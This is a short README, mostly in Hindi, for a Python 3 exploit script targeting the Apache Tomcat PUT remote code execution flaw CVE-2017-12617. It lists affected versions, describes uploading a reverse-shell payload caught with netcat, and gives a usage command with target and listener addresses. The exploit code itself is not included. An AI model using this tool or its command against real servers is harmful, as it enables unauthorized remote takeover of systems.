
CVE-2017-12617 is a critical vulnerability leading to Remote Code Execution (RCE) in Apache Tomcat.
CVE-2017-12617 एक गंभीर कमजोरी है जो Apache Tomcat में रिमोट कोड निष्पादन (RCE) की ओर ले जाती है।
यह कमजोरी संस्करण 9.0.0.M1 - 9.0.0, 8.5.0-8.5.22, 8.0.0.RC1 - 8.0.46, 7.0.0 - 7.0.81 पर काम करती है।
केवल 8.0.24 पर परीक्षण किया गया। कमजोरी एप्लिकेशन या Tomcat इंस्टेंस पर गलत कॉन्फ़िगर किए गए PUT विकल्प का उपयोग करती है।
यह PUT का उपयोग करके सर्वर पर रिवर्स शेल पेलोड भेजती है और netcat के साथ सुनते हुए इसे निष्पादित करती है।
चूंकि इंटरनेट पर उसी एक्सप्लॉइट के कई संस्करण हैं लेकिन वे python2 पर आधारित हैं, मैंने इसे Python 3 के साथ काम करने के लिए फिर से लिखा है।
मज़े करें।
Usage example:
python3 cve-2017-12617.py -t 127.0.0.1 -p 8888 -l 192.168.1.118 -P 5555
